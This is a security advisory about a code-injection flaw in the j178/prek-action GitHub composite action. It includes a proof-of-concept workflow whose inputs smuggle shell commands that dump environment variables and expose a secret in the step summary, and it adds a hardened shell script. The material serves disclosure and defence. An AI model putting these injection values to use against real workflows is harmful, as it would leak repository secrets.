GHSA-pwf7-47c3-mfhx: j178/prek-action vulnerable to arbitrary code injection in composite action

Summary

There are three potential arbitrary code injection attack vectors in the composite action defined in action.yml.

Details

The GitHub Action variables inputs.prek-version, inputs.extra_args, and inputs.extra-args can be used to execute arbitrary code in the context of the action.

PoC

- uses: j178/prek-action@v1.0.5
  with:
    prek-version: $(printenv >> $GITHUB_STEP_SUMMARY && echo "0.2.2")
    extra_args: '&& echo "MY_SECRET with a character is: ${MY_SECRET:0:1}a${MY_SECRET:1}" >> $GITHUB_STEP_SUMMARY && echo ""'
  env:
    MY_SECRET: ${{ secrets.MY_SECRET }}

The previous example prints every environment variable to the workflow's step summary and exposes the value of the MY_SECRET environment variable there. An attacker could use this vector to compromise the security of the target repository while going unnoticed, because the action still runs normally.
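The underlying problem is that `${{ inputs.* }}` expressions are substituted into the `run:` script text before the shell parses it, so `$(...)` and `&&` in an input become code. The following is an added example, not the advisory's or j178/prek-action's own code: it shows the hardened shape of such a step, where inputs reach the script only as environment variables (the `action.yml` wiring in the comment and the `prek` stand-in are assumptions).

```shell
#!/bin/sh
# Assumed action.yml wiring (not the project's actual file):
#   - shell: bash
#     env:
#       PREK_VERSION: ${{ inputs.prek-version }}
#       EXTRA_ARGS:   ${{ inputs.extra_args }}
#     run: ./run_prek.sh "$PREK_VERSION" "$EXTRA_ARGS"
# The values are now data in the environment, never part of the script text.

# Accept only "latest" or a plain dotted version such as 0.2.2.
validate_version() {
  case "$1" in
    latest) return 0 ;;
    *[!0-9.]*|"") return 1 ;;   # any character outside [0-9.] is rejected
    *) return 0 ;;
  esac
}

# Hypothetical stand-in for the real prek binary so the script runs offline:
# it only echoes the argument vector it would have been invoked with.
prek() {
  printf 'prek'
  for a in "$@"; do printf ' [%s]' "$a"; done
  printf '\n'
}

run_prek() {
  version=$1
  extra=$2
  validate_version "$version" || {
    echo "invalid prek-version: $version" >&2
    return 2
  }
  # Unquoted expansion of $extra only word-splits it into separate arguments;
  # the shell does NOT evaluate $(...), && or ; inside a variable's value, so
  # they arrive at prek as literal strings. set -f also disables globbing.
  set -f
  # shellcheck disable=SC2086
  set -- $extra
  prek --version "$version" run "$@"
}
```

Compare this with the PoC above: the same `extra_args` payload becomes inert argument strings, and the `prek-version` payload is rejected before anything runs.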

Impact

Critical, CWE-94


References

  • GHSA-pwf7-47c3-mfhx
  • j178/prek-action@6b7c6ef